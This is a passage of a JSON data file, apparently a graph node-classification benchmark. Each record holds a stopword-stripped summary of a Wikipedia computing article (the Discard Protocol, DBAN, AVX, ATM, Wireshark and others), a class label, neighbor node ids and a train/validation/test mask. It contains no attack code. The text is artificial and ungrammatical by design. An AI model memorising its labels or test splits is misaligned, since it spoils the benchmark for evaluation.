    "text": "Interfolio:interfolio interfolio academic faculty management software higher education technology company based washington d.c company provides software assist shared governance processes faculty activity tracking tools assist institutional accreditation reporting january 2016 company acquired 12 million investor funding interfolio founded georgetown university senior steve goldenberg 1999 interfolio ’ services represents complete faculty lifecycle information system interfolio created streamline college application process academic jobs providing online portfolio application system principal interfolio services includes dossier service collecting curating delivering academic materials scholarly opportunities interfolio based module faculty information includes workflow evaluation suite well tool faculty activity reporting",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 829,
    "label": 5,
    "text": "Discard_Protocol:discard protocol discard protocol service internet protocol suite defined rfc 863 intended testing debugging measurement host management purposes host may send data host supports discard protocol either transmission control protocol tcp user datagram protocol udp port number 9 data sent server simply discarded response returned reason udp usually used tcp allows services accessible session-oriented connections example via http proxies vpn unix-like operating systems discard server built inetd xinetd daemon discard service usually enabled default may enabled adding following lines file /etc/inetd.conf reloading configuration discard protocol tcp/udp equivalent unix filesystem node codice_1 service guaranteed receive sent used debugging tcp and/or udp code requiring guaranteed reception payload sent various routers tcp udp port 9 discard protocol port 7 echo protocol relaying icmp datagrams also used default proxy relay wake-on-lan wol magic packets internet hosts local network order wake remotely hosts must also network adapter configured accept wol datagrams router must proxy setting enabled possibly also configuration forwarding rules embedded firewall open ports internet side",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      5397,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      933,
      2085,
      3750,
      3751,
      3752,
      8998,
      9381,
      10924,
      562,
      2996,
      9909,
      6651,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      8386,
      7364,
      2887,
      8265,
      2509,
      4687,
      849,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      871,
      10344,
      11112,
      367,
      8432,
      5749,
      891
    ],
    "mask": "None"
  },
  {
    "node_id": 830,
    "label": 4,
    "text": "National_Software_Reference_Library:national software reference library national software reference library nsrl project national institute standards technology nist maintains repository known software file profiles file signatures use law enforcement organizations involved computer forensic investigations project supported united states department justice national institute justice federal bureau investigation fbi defense computer forensics laboratory dcfl u.s. customs service software vendors state local law enforcement also provides research environment computational analysis large sets files nsrl made three major elements nsrl collects software various sources computes message digests cryptographic hash values digests stored reference data set rds used identify known files digital media help alleviate much effort involved determining files important evidence computers file systems seized part criminal investigations although rds hashset contains malicious software steganography hacking tools contain illicit material e.g indecent images collection original software media maintained order provide repeatability calculated hash values ensuring admissibility data court 2004 nsrl released set hashes verifying evoting software part us election assistance commission electronic voting security strategy october 1 2013 reference data set version 2.42 contains 33.9 million unique hash values data set available cost public addition operating system application software library also collected numerous popular video game titles used part data forensics well partially serve video game preservation",
    "neighbors": [
      2437,
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      5284,
      11182,
      10290,
      4789,
      8635,
      2494,
      7369,
      1994,
      6475,
      10189,
      4049,
      4956,
      4834,
      5475,
      7525,
      9319,
      7160,
      11642
    ],
    "mask": "None"
  },
  {
    "node_id": 831,
    "label": 2,
    "text": "Darik's_Boot_and_Nuke:darik boot nuke darik boot nuke also known dban free open-source project hosted sourceforge program designed securely erase hard disk data permanently removed longer recoverable achieved overwriting data pseudorandom numbers generated mersenne twister isaac gutmann method quick erase dod short 3 passes dod 5220.22-m 7 passes also included options handle data remanence dban booted cd dvd usb flash drive diskless using preboot execution environment based linux supports pata ide scsi sata hard drives dban configured automatically wipe every hard disk sees system entire network systems making useful unattended data destruction scenarios dban exists x86 systems dban like methods data erasure suitable use prior computer recycling personal commercial situations donating selling computer september 2012 blancco finland announced acquisition dban recent version dban 2.30 released 4 june 2015 since time dban development seems ended official website used blancco market blancco drive eraser instead unofficial fork dban actively maintained dwipe program dban uses forked available standalone command line program called nwipe actively maintained nwipe incorporated free software rescue toolkit packages one system rescue toolkit",
    "neighbors": [
      1475,
      3972,
      8997,
      2534,
      11368,
      7369,
      7983,
      9807,
      3314,
      499,
      3572,
      7090,
      9086,
      823,
      10195,
      9499,
      6494
    ],
    "mask": "None"
  },
  {
    "node_id": 832,
    "label": 7,
    "text": "Knowland_Group:knowland group knowland web-based software company provides business development products services hospitality industry knowland traces roots back small software engineering firm firm spent months developing entirely new kind hotel readerboard service heavily reliant web technology client industry client backed knowland ’ founders recognized hospitality industry ’ need higher standard market intelligence decided start hospitality field research service fall 2004 online readerboard service launched knowland signed first client holiday inn arlington va. september 2004 2005 company expanded 20 markets serving diverse clientele single multi-property clients end 2006 knowland 400 clients 60 markets tracked 200,000 events 2007 knowland introduced insight tool generates targeted sales leads details prospect ’ event booking history company also activated 7,000 square foot call center expand infrastructure customer support in-depth contact event research sales activities behalf customers event booking center employs research sales support professionals specialize cold calling become extension hotel clients ’ sales staff knowland launched target net meetings management sales force automation platform 2010 addition managing events start finish target net also generated sales leads opportunities product discontinued 2015 today knowland provider intuitive business intelligence products hospitality industry 3,000 client hotels 50,000 users globally knowland provider business development solutions hospitality industry target net insight readers cloud-based accessible computer connected internet target net salesforce automation meetings management tool allows hoteliers manage sales funnel start finish knowland longer sells target net product continues offer support clients already using insight search engine sales lead-generation tool gives hotel sales teams access database groups held millions meetings hotels conference centers 2014 knowland released insight 3.0 effort enhance insight platform transformed traditional search engine leads database customizable meeting intelligence tool event professionals insight 3.0 included new features anonymous reviews groups events ability follow groups properties people detailed group profiles receiving many unfavorable reviews clients regarding changes insight 3.0 release knowland launched insight 3.1 following year 2015 insight 3.1 designed almost entirely around user feedback release leveraged powerful enhanced search capabilities tool putting popular search features spotlight insight 3.1 made focus knowland technology less social media-influenced networking power raw historical data groups planners meetings contact information help clients optimize sales tactics readers online readerboard service offers daily reporting data groups hold meetings events hotels competitor properties readers combines online tool knowland ’ version traditional readerboard report addition telephone-verified contact information week approximately 400 field researchers take digital photos hotel readerboards photos uploaded night knowland database data made available online clients next morning new groups constantly added database detailed profiles created updated group april 2014 knowland released new data management process help maintain accuracy freshness information provided knowland group ranked 26th deloitte ’ 2010 technology fast 500™ list october 2010 list identifies fastest-growing technology media telecommunications life sciences clean technology companies north america rankings award based fiscal revenue growth 2005–2009 knowland grew 5,764 percent knowland ranked fifth 190 companies software industry largest industry recognized fast 500™ list knowland ranked first greater philadelphia fast 50 list target net knowland ’ sales force automation meetings management tool received 2010 product year award technology marketing corporation ’ customer interaction solutions magazine award given annually companies based vision leadership diligence",
    "neighbors": [
      4194,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 833,
    "label": 3,
    "text": "Advanced_Vector_Extensions:advanced vector extensions advanced vector extensions avx also known sandy bridge new extensions extensions x86 instruction set architecture microprocessors intel amd proposed intel march 2008 first supported intel sandy bridge processor shipping q1 2011 later amd bulldozer processor shipping q3 2011 avx provides new features new instructions new coding scheme avx2 expands integer commands 256 bits introduces fused multiply-accumulate fma operations avx-512 expands avx 512-bit support using new evex prefix encoding proposed intel july 2013 first supported intel knights landing processor shipped 2016 avx uses sixteen ymm registers perform single instruction multiple pieces data see simd ymm register hold simultaneous operations math width simd registers increased 128 bits 256 bits renamed xmm0–xmm7 ymm0–ymm7 x86-64 mode ymm0–ymm15 legacy sse instructions still utilized via vex prefix operate lower 128 bits ymm registers avx introduces three-operand simd instruction format destination register distinct two source operands example sse instruction using conventional two-operand form b use non-destructive three-operand form c b preserving source operands avx three-operand format limited instructions simd operands ymm include instructions general purpose registers e.g eax support first appear avx2 alignment requirement simd memory operands relaxed new vex coding scheme introduces new set code prefixes extends opcode space allows instructions two operands allows simd vector registers longer 128 bits vex prefix also used legacy sse instructions giving three-operand form making interact efficiently avx instructions without need vzeroupper vzeroall avx instructions support 128-bit 256-bit simd 128-bit versions useful improve old code without needing widen vectorization avoid penalty going sse avx also faster early amd implementations avx mode sometimes known avx-128 avx instructions addition ones 256-bit extensions legacy 128-bit sse instructions usable 128-bit 256-bit operands cpus listed families support avx generally cpus commercial denomination core i3/i5/i7 support whereas pentium celeron cpus n't issues regarding compatibility future intel amd processors discussed xop instruction set gcc starting version 4.6 although 4.3 branch certain support intel compiler suite starting version 11.1 support avx visual studio 2010/2012 compiler supports avx via intrinsic /arch avx switch open64 compiler version 4.5.1 supports avx -mavx flag absoft supports -mavx flag pathscale supports via -mavx flag free pascal compiler supports avx avx2 -cfavx -cfavx2 switches version 2.7.1 vector pascal compiler supports avx via -cpuavx32 flag gnu assembler gas inline assembly functions support instructions accessible via gcc intel primitives intel inline assembler closely compatible gas although general handling local references within inline code assemblers masm vs2010 version yasm fasm nasm jwasm avx adds new register-state 256-bit wide ymm register file explicit operating system support required properly save restore avx expanded registers context switches following operating system versions support avx advanced vector extensions 2 avx2 also known haswell new instructions expansion avx instruction set introduced intel haswell microarchitecture avx2 makes following additions sometimes another extension using different cpuid flag considered part avx2 instructions listed page avx-512 512-bit extensions 256-bit advanced vector extensions simd instructions x86 instruction set architecture proposed intel july 2013 scheduled supported 2015 intel knights landing processor avx-512 instruction encoded new evex prefix allows 4 operands 7 new 64-bit opmask registers scalar memory mode automatic broadcast explicit rounding control compressed displacement memory addressing mode width register file increased 512 bits total register count increased 32 registers zmm0-zmm31 x86-64 mode avx-512 consists multiple extensions meant supported processors implementing instruction set consists following core extension avx-512f avx-512 foundation required implementations though current processors also support cd conflict detection computing coprocessors additionally support er pf 4vnniw 4fmaps vpopcntdq desktop processors support vl dq bw ifma vbmi vpopcntdq vpclmulqdq etc updated sse/avx instructions avx-512f use mnemonics avx versions operate 512-bit zmm registers also support 128/256 bit xmm/ymm registers avx-512vl byte word doubleword quadword integer operands avx-512bw/dq vbmi",
    "neighbors": [
      4108,
      5645,
      5649,
      5663,
      2088,
      2094,
      1085,
      1087,
      7234,
      3142,
      585,
      8795,
      1119,
      2655,
      1122,
      7783,
      4204,
      4217,
      4237,
      6797,
      10383,
      7313,
      8855,
      9369,
      1178,
      2719,
      6821,
      9391,
      2224,
      9911,
      2237,
      2764,
      5326,
      3282,
      5844,
      9428,
      7387,
      3294,
      8937,
      10985,
      5356,
      9964,
      5358,
      8944,
      8438,
      9976,
      5883,
      2821,
      1798,
      6924,
      9996,
      4886,
      7963,
      9500,
      815,
      7983,
      823,
      4920,
      8506,
      5952,
      6978,
      9541,
      11080,
      4444,
      9582,
      372,
      1399,
      1915,
      10620,
      9092,
      9095,
      4491,
      6038,
      9111,
      7071,
      5541,
      9126,
      8120,
      7097,
      8125,
      8126,
      1998,
      977,
      1489,
      2514,
      2516,
      3537,
      5073,
      2535,
      1000,
      8169,
      499,
      3573,
      4603
    ],
    "mask": "Test"
  },
  {
    "node_id": 834,
    "label": 1,
    "text": "NaGISA:nagisa nagisa natural geography shore areas natural geography in-shore areas international collaborative effort aimed inventorying cataloguing monitoring biodiversity in-shore area named japanese word nagisa land meets sea apronym nagisa first project larger coml effort census marine life global participation actual field work actual procedures project involve inexpensive collection equipment easy universal participation equipment used photograph sampling sites actually take samples sites process samples site throughout world samples taken intertidal zone depth 10 meters optionally 20 meters depth samples processed organisms isolated analyzed catalogued information regarding kind number organisms analyzed sent global headquarters nagisa- university kyoto japan information collated ocean biogeographic information system obis website end goal larger coml effort find world oceans nagisa goal find world in-shore areas",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 835,
    "label": 5,
    "text": "Asynchronous_transfer_mode:asynchronous transfer mode asynchronous transfer mode atm according atm forum telecommunications concept defined ansi itu formerly ccitt standards carriage complete range user traffic including voice data video signals atm developed meet needs broadband integrated services digital network defined late 1980s designed integrate telecommunication networks additionally designed networks must handle traditional high-throughput data traffic e.g. file transfers real-time low-latency content voice video reference model atm approximately maps three lowest layers iso-osi reference model network layer data link layer physical layer atm core protocol used sonet/sdh backbone public switched telephone network pstn integrated services digital network isdn use declining favour ip atm provides functionality similar circuit switching packet switching networks atm uses asynchronous time-division multiplexing encodes data small fixed-sized packets iso-osi frames called cells differs approaches internet protocol ethernet use variable sized packets frames atm uses connection-oriented model virtual circuit must established two endpoints actual data exchange begins virtual circuits may “ permanent ” i.e dedicated connections usually preconfigured service provider “ switched ” i.e set per-call basis using signaling disconnected call terminated use atm technology eventually largely superseded internet protocol ip -only technology wireless mobile atm never established significant foothold iso-osi reference model data link layer layer 2 basic transfer units generically called frames atm frames fixed 53 octets bytes length specifically called cells speech signal reduced packets forced share link bursty data traffic traffic large data packets matter small speech packets could made would always encounter full-size data packets normal queuing conditions cells might experience maximum queuing delays avoid issue atm packets cells small size addition fixed cell structure means atm readily switched hardware without inherent delays introduced software switched routed frames thus designers atm utilized small data cells reduce jitter delay variance case multiplexing data streams reduction jitter also end-to-end round-trip delays particularly important carrying voice traffic conversion digitized voice analogue audio signal inherently real-time process good job decoder codec needs evenly spaced time stream data items next data item available needed codec choice produce silence guess — data late useless time period converted signal already passed time design atm 155 mbit/s synchronous digital hierarchy sdh 135 mbit/s payload considered fast optical network link many plesiochronous digital hierarchy pdh links digital network considerably slower ranging 1.544 45 mbit/s us 2 34 mbit/s europe 155 mbit/s typical full-length 1,500 byte 12,000-bit data packet sufficient contain maximum-sized ip packet ethernet would take 77.42 µs transmit lower-speed link 1.544 mbit/s t1 line packet would take 7.8 milliseconds queuing delay induced several data packets might exceed figure 7.8 ms several times addition packet generation delay shorter speech packet clearly unacceptable speech traffic needs low jitter data stream fed codec produce good-quality sound packet voice system produce low jitter number ways design atm aimed low-jitter network interface however cells introduced design provide short queuing delays continuing support datagram traffic atm broke packets data voice streams 48-byte chunks adding 5-byte routing header one could reassembled later choice 48 bytes political rather technical ccitt itu-t standardizing atm parties united states wanted 64-byte payload felt good compromise larger payloads optimized data transmission shorter payloads optimized real-time applications like voice parties europe wanted 32-byte payloads small size therefore short transmission times simplify voice applications respect echo cancellation european parties eventually came around arguments made americans france others held shorter cell length 32 bytes france would able implement atm-based voice network calls one end france requiring echo cancellation 48 bytes plus 5 header bytes 53 chosen compromise two sides 5-byte headers chosen thought 10 payload maximum price pay routing information atm multiplexed 53-byte cells instead packets reduced worst-case cell contention jitter factor almost 30 reducing need echo cancellers atm cell consists 5-byte header 48-byte payload payload size 48 bytes chosen described atm defines two different cell formats user–network interface uni network–network interface nni atm links use uni cell format atm uses pt field designate various special kinds cells operations administration management oam purposes delineate packet boundaries atm adaptation layers aal significant bit msb pt field 0 user data cell two bits used indicate network congestion general purpose header bit available atm adaptation layers msb 1 management cell two bits indicate type network management segment network management end-to-end resource management reserved future use several atm link protocols use hec field drive crc-based framing algorithm allows locating atm cells overhead beyond otherwise needed header protection 8-bit crc used correct single-bit header errors detect multi-bit header errors multi-bit header errors detected current subsequent cells dropped cell header errors found uni cell reserves gfc field local flow control/submultiplexing system users intended allow several terminals share single network connection way two integrated services digital network isdn phones share single basic rate isdn connection four gfc bits must zero default nni cell format replicates uni format almost exactly except 4-bit gfc field re-allocated vpi field extending vpi 12 bits thus single nni atm interconnection capable addressing almost 2 vps almost 2 vcs practice vp vc numbers reserved atm supports different types services via aals standardized aals include aal1 aal2 aal5 rarely used aal3 aal4 aal1 used constant bit rate cbr services circuit emulation synchronization also maintained aal1 aal2 aal4 used variable bitrate vbr services aal5 data aal use given cell encoded cell instead negotiated configured endpoints per-virtual-connection basis following initial design atm networks become much faster 1500 byte 12000-bit full-size ethernet frame takes 1.2 µs transmit 10 gbit/s network reducing need small cells reduce jitter due contention consider makes case replacing atm ethernet network backbone increased link speeds alleviate jitter due queuing additionally hardware implementing service adaptation ip packets expensive high speeds specifically speeds oc-3 cost segmentation reassembly sar hardware makes atm less competitive ip packet sonet pos fixed 48-byte cell payload atm suitable data link layer directly underlying ip without need sar data link level since osi layer ip operates must provide maximum transmission unit mtu least 576 bytes sar performance limits mean fastest ip router atm interfaces stm16 stm64 actually compares pos operate oc-192 stm64 higher speeds expected future limits based segmentation reassembly sar slower congested links 622 mbit/s atm make sense reason asymmetric digital subscriber line adsl systems use atm intermediate layer physical link layer layer 2 protocol like ppp ethernet lower speeds atm provides useful ability carry multiple logical circuits single physical virtual medium although techniques exist multi-link ppp ethernet vlans optional vdsl implementations dsl used access method atm network allowing dsl termination point telephone central office connect many internet service providers across wide-area atm network united states least allowed dsl providers provide dsl access customers many internet service providers since one dsl termination point support multiple isps economic feasibility dsl substantially improved atm operates channel-based transport layer using virtual circuits vcs encompassed concept virtual paths vp virtual channels every atm cell 8- 12-bit virtual path identifier vpi 16-bit virtual channel identifier vci pair defined header vci together vpi used identify next destination cell passes series atm switches way destination length vpi varies according whether cell sent user-network interface edge network sent network-network interface inside network cells traverse atm network switching takes place changing vpi/vci values label swapping although vpi/vci values necessarily consistent one end connection concept circuit consistent unlike ip given packet could get destination different route others atm switches use vpi/vci fields identify virtual channel link vcl next network cell needs transit way final destination function vci similar data link connection identifier dlci frame relay logical channel number logical channel group number x.25 another advantage use virtual circuits comes ability use multiplexing layer allowing different services voice frame relay n* 64 channels ip vpi useful reducing switching table virtual circuits common paths another key atm concept involves traffic contract atm circuit set switch circuit informed traffic class connection atm traffic contracts form part mechanism quality service qos ensured four basic types several variants set parameters describing connection vbr real-time non-real-time variants serves bursty traffic non-real-time sometimes abbreviated vbr-nrt traffic classes also introduce concept cell-delay variation tolerance cdvt defines clumping cells time maintain network performance networks may apply traffic policing virtual circuits limit traffic contracts entry points network i.e user–network interfaces unis network-to-network interfaces nnis usage/network parameter control upc npc reference model given itu-t atm forum upc npc generic cell rate algorithm gcra version leaky bucket algorithm cbr traffic normally policed pcr cdvt alone whereas vbr traffic normally policed using dual leaky bucket controller pcr cdvt scr maximum burst size mbs mbs normally packet sar-sdu size vbr vc cells traffic virtual circuit exceeding traffic contract determined gcra network either drop cells mark cell loss priority clp bit identify cell potentially redundant basic policing works cell cell basis sub-optimal encapsulated packet traffic discarding single cell invalidate whole packet result schemes partial packet discard ppd early packet discard epd created discard whole series cells next packet starts reduces number useless cells network saving bandwidth full packets epd ppd work aal5 connections use end packet marker atm user-to-atm user auu indication bit payload-type field header set last cell sar-sdu traffic shaping usually takes place network interface card nic user equipment attempts ensure cell flow vc meet traffic contract i.e cells dropped reduced priority uni since reference model given traffic policing network gcra algorithm normally used shaping well single dual leaky bucket implementations may used appropriate atm build virtual circuits virtual paths either statically dynamically static circuits permanent virtual circuits pvcs paths permanent virtual paths pvps require circuit composed series segments one pair interfaces passes pvps pvcs though conceptually simple require significant effort large networks also support re-routing service event failure dynamically built pvps soft pvps spvps pvcs soft pvcs spvcs contrast built specifying characteristics circuit service contract two end points atm networks create remove switched virtual circuits svcs demand requested end piece equipment one application svcs carry individual telephone calls network telephone switches inter-connected using atm svcs also used attempts replace local area networks atm atm networks supporting spvps spvcs svcs use private network node interface private network-to-network interface pnni protocol pnni uses shortest-path-first algorithm used ospf is-is route ip packets share topology information switches select route network pnni also includes powerful summarization mechanism allow construction large networks well call admission control cac algorithm determines availability sufficient bandwidth proposed route network order satisfy service requirements vc vp network must establish connection two parties send cells atm called virtual circuit vc permanent virtual circuit pvc created administratively end points switched virtual circuit svc created needed communicating parties svc creation managed signaling requesting party indicates address receiving party type service requested whatever traffic parameters may applicable selected service call admission performed network confirm requested resources available route exists connection atm specifies following three layers atm became popular telephone companies many computer makers 1990s however even end decade better price/performance internet protocol-based products competing atm technology integrating real-time bursty network traffic companies fore systems focused atm products large vendors cisco systems provided atm option burst dot-com bubble still predicted atm going dominate however 2005 atm forum trade organization promoting technology merged groups promoting technologies eventually became broadband forum wireless atm mobile atm consists atm core network wireless access network atm cells transmitted base stations mobile terminals mobility functions performed atm switch core network known crossover switch similar msc mobile switching center gsm networks advantage wireless atm high bandwidth high speed handoffs done layer 2 early 1990s bell labs nec research labs worked actively field andy hopper cambridge university computer laboratory also worked area wireless atm forum formed standardize technology behind wireless atm networks forum supported several telecommunication companies including nec fujitsu mobile atm aimed provide high speed multimedia communications technology capable delivering broadband mobile communications beyond gsm wlans",
    "neighbors": [
      1541,
      2701,
      2206,
      1955,
      8355,
      3751,
      9137,
      6834,
      4918,
      7865,
      2912,
      3168,
      5472,
      2532,
      4331,
      6512,
      8432,
      2802,
      3318,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 836,
    "label": 4,
    "text": "Science_DMZ_Network_Architecture:science dmz network architecture term science dmz refers computer subnetwork structured secure without performance limits would otherwise result passing data stateful firewall science dmz designed handle high volume data transfers typical scientific high-performance computing creating special dmz accommodate transfers typically deployed near local network perimeter optimized moderate number high-speed flows rather general-purpose business systems enterprise computing term science dmz coined collaborators us department energy esnet 2010 number universities laboratories deployed deploying science dmz 2012 national science foundation funded creation improvement science dmzs several university campuses united states science dmz network architecture support big data so-called information explosion discussed since mid 1960s recently term data deluge used describe exponential growth many types data sets huge data sets often need copied one location another using internet movement data sets magnitude reasonable amount time possible modern networks example take less 4 hours transfer 10 terabytes data 10 gigabit ethernet network path assuming disk performance adequate problem requires networks free packet loss middleboxes traffic shapers firewalls slow network performance businesses institutions use firewall protect internal network malicious attacks originating outside traffic internal network external internet must pass firewall discards traffic likely harmful stateful firewall tracks state logical connection passing rejects data packets inappropriate state connection example website would allowed send page computer internal network unless computer requested requires firewall keep track pages recently requested match requests responses firewall must also analyze network traffic much detail compared networking components routers switches routers deal network layer firewalls must also process transport application layers well additional processing takes time limits network throughput routers networking components handle speeds 100 billion bits per second gbps firewalls limit traffic 1 gbit/s unacceptable passing large amounts scientific data stateful firewall may necessary critical business data financial records credit cards employment data student grades trade secrets etc. science data requires less protection copies usually exists multiple locations less economic incentive tamper firewall must restrict access internal network allow external access services offered public web servers internal network usually accomplished creating separate internal network called dmz play term “ demilitarized zone external devices allowed access devices dmz devices dmz usually maintained carefully reduce vulnerability malware hardened devices sometimes called bastion hosts science dmz takes dmz idea one step farther moving high performance computing dmz specially configured routers pass science data directly designated devices internal network thereby creating virtual dmz security maintained setting access control lists acls routers allow traffic to/from particular sources destinations security enhanced using intrusion detection system ids monitor traffic look indications attack attack detected ids automatically update router tables resulting call remotely triggered blackhole rtbh science dmz provides well-configured location networking systems security infrastructure supports high-performance data movement data-intensive science environments data sets outgrown portable media default configurations used many equipment software vendors inadequate high performance applications components science dmz specifically configured support high performance applications facilitate rapid diagnosis performance problems without deployment dedicated infrastructure often impossible achieve acceptable performance simply increasing network bandwidth usually good enough performance problems caused many factors ranging underpowered firewalls dirty fiber optics untuned operating systems science dmz codification set shared best practices—concepts developed years—from scientific networking systems community science dmz model describes essential components high-performance data transfer infrastructure way accessible non-experts scalable across size institution experiment primary components science dmz optional science dmz components include",
    "neighbors": [
      8998,
      1607,
      5608,
      2985,
      11502,
      6364,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 837,
    "label": 9,
    "text": "Language_for_Systems_Development:language systems development language systems development lsd programming language developed 1971 brown university ibm s/360 language also referred lsyd due negative connotations acronym lsd time lsd derived pl/i",
    "neighbors": [
      8502,
      8262,
      4998
    ],
    "mask": "Test"
  },
  {
    "node_id": 838,
    "label": 4,
    "text": "AuthenTec:authentec authentec inc. semiconductor computer security mobile security identity management biometrics touch control solutions company based melbourne florida founded 1998 spun harris semiconductor authentec provided mobile security software licenses mobile manufacturing companies biometrics sensor technology fingerprint sensors nfc technology mobile computer manufacturers 27 july 2012 authentec acquired apple inc. 356 million",
    "neighbors": [
      10755,
      9732,
      1549,
      7697,
      11289,
      4126,
      6186,
      6700,
      1074,
      9784,
      8253,
      576,
      2558,
      8783,
      4180,
      10838,
      9826,
      5733,
      8806,
      3691,
      2676,
      6264,
      2686,
      7806,
      6783,
      10878,
      8842,
      9356,
      5784,
      1177,
      4251,
      2207,
      7327,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      1772,
      4844,
      8441,
      2819,
      1290,
      9999,
      784,
      4888,
      10023,
      4399,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      2388,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      6023,
      6539,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      3521,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      10207,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 839,
    "label": 4,
    "text": "List_of_compact_discs_sold_with_Extended_Copy_Protection:list compact discs sold extended copy protection following compact discs sold sony bmg shipped computer software known extended copy protection xcp result microsoft windows computer used play cds likely xcp installed cause number serious security problems several security software vendors including microsoft regard xcp trojan horse spyware rootkit mac os x systems used play cds may affected similar program mediamax",
    "neighbors": [
      10756,
      6797,
      10448,
      7957,
      10392,
      2558,
      9791
    ],
    "mask": "Validation"
  },
  {
    "node_id": 840,
    "label": 9,
    "text": "FLACC:flacc flacc implementation algol 68 programming language chris thomson colin broughton founded chion corporation developed marketed flacc full language algol 68 checkout compiler compiler run-time system conformed exactly revised report ran ibm 370 compatible mainframes included debugging features derived watfiv released 1977 chris student barry j. mailloux barry studied amsterdam mathematisch centrum 1966 adriaan van wijngaarden barry work algol 68 language established university alberta center algol 68-related activity according thomson decade later scanned documentation softwarepreservation.org",
    "neighbors": [
      1952,
      8262,
      6248,
      1611,
      7053,
      9294,
      7507
    ],
    "mask": "None"
  },
  {
    "node_id": 841,
    "label": 5,
    "text": "Hot_Standby_Router_Protocol:hot standby router protocol computer networking hot standby router protocol hsrp cisco proprietary redundancy protocol establishing fault-tolerant default gateway version 1 protocol described 1998 rfc version 2 protocol protocol establishes association gateways order achieve default gateway failover primary gateway becomes inaccessible hsrp gateways send multicast hello messages gateways notify priorities gateway preferred current status active standby primary router highest configured priority act virtual router pre-defined gateway ip address respond arp nd request machines connected lan virtual mac address primary router fail router next-highest priority would take gateway ip address answer arp requests mac address thus achieving transparent default gateway failover virtual mac address xs represent group id hex hsrp routing protocol advertise ip routes affect routing table way hsrp ability trigger failover one interfaces router go useful dual branch routers single link back gateway link primary router goes backup router take primary functionality thus retain connectivity gateway version 2 protocol introduces stability scalability diagnostic improvements compatible version 1 hsrp rfc version 2 protocol",
    "neighbors": [
      5472,
      6214,
      7901,
      649,
      2954,
      8073,
      9640,
      6993,
      6834,
      7411,
      11413,
      7702,
      5437
    ],
    "mask": "None"
  },
  {
    "node_id": 842,
    "label": 4,
    "text": "Wireshark:wireshark wireshark free open-source packet analyzer used network troubleshooting analysis software communications protocol development education originally named ethereal project renamed wireshark may 2006 due trademark issues wireshark cross-platform using qt widget toolkit current releases implement user interface using pcap capture packets runs linux macos bsd solaris unix-like operating systems microsoft windows also terminal-based non-gui version called tshark wireshark programs distributed tshark free software released terms gnu general public license wireshark similar tcpdump graphical front-end plus integrated sorting filtering options wireshark lets user put network interface controllers promiscuous mode supported network interface controller see traffic visible interface including unicast traffic sent network interface controller mac address however capturing packet analyzer promiscuous mode port network switch traffic switch necessarily sent port capture done capturing promiscuous mode necessarily sufficient see network traffic port mirroring various network taps extend capture point network simple passive taps extremely resistant tampering gnu/linux bsd macos libpcap 1.0.0 later wireshark 1.4 later also put wireless network interface controllers monitor mode remote machine captures packets sends captured packets machine running wireshark using tzsp protocol protocol used omnipeek wireshark dissects packets analyze packets captured remote machine time captured late 1990s gerald combs computer science graduate university missouri–kansas city working small internet service provider commercial protocol analysis products time priced around 1500 run company primary platforms solaris linux gerald began writing ethereal released first version around 1998 ethereal trademark owned network integration services may 2006 combs accepted job cace technologies combs still held copyright ethereal source code rest re-distributable gnu gpl used contents ethereal subversion repository basis wireshark repository however ethereal trademark changed name wireshark 2010 riverbed technology purchased cace took primary sponsor wireshark ethereal development ceased ethereal security advisory recommended switching wireshark wireshark several industry awards years including eweek infoworld pc magazine also top-rated packet sniffer insecure.org network security tools survey sourceforge project month august 2010 combs continues maintain overall code wireshark issue releases new versions software product website lists 600 additional contributing authors wireshark data capturing program understands structure encapsulation different networking protocols parse display fields along meanings specified different networking protocols wireshark uses pcap capture packets capture packets types networks pcap supports wireshark native network trace file format libpcap format supported libpcap winpcap exchange captured network traces applications use format including tcpdump ca netmaster also read captures network analyzers snoop network general sniffer microsoft network monitor capturing raw network traffic interface requires elevated privileges platforms reason older versions ethereal/wireshark tethereal/tshark often ran superuser privileges taking account huge number protocol dissectors called traffic captured pose serious security risk given possibility bug dissector due rather large number vulnerabilities past many allowed remote code execution developers doubts better future development openbsd removed ethereal ports tree prior openbsd 3.6 elevated privileges needed operations example alternative run tcpdump dumpcap utility comes wireshark superuser privileges capture packets file later analyze packets running wireshark restricted privileges emulate near realtime analysis captured file may merged mergecap growing file processed wireshark wireless networks possible use aircrack wireless security tools capture ieee 802.11 frames read resulting dump files wireshark wireshark 0.99.7 wireshark tshark run dumpcap perform traffic capture platforms require special privileges capture traffic need dumpcap run privileges neither wireshark tshark need run special privileges wireshark color packets based rules match particular fields packets help user identify types traffic glance default set rules provided users change existing rules coloring packets add new rules remove rules wireshark also used capture packets network simulation tools ns opnet modeler netsim",
    "neighbors": [
      3714,
      6797,
      4369,
      4373,
      5397,
      7702,
      5657,
      6177,
      418,
      10788,
      1064,
      1580,
      7983,
      7984,
      2739,
      7989,
      823,
      2231,
      4919,
      8121,
      5179,
      700,
      4797,
      11321,
      706,
      6345,
      461,
      8653,
      11006,
      6992,
      10705,
      9939,
      6997,
      2006,
      87,
      7895,
      7385,
      4186,
      8922,
      9440,
      4834,
      5990,
      10343,
      10346,
      5612,
      8432,
      381,
      7411,
      2292,
      11250,
      2045,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 843,
    "label": 2,
    "text": "Kay_Sievers:kay sievers kay sievers computer programmer best known developing udev device manager linux systemd gummiboot efi boot loader kay sievers made major contributions linux hardware hotplug device management subsystems 2012 together harald hoyer sievers main driving force behind fedora merging /lib /bin /sbin file-system trees /usr simplification distributions arch linux since adopted kay sievers grew east germany nowadays resides berlin germany",
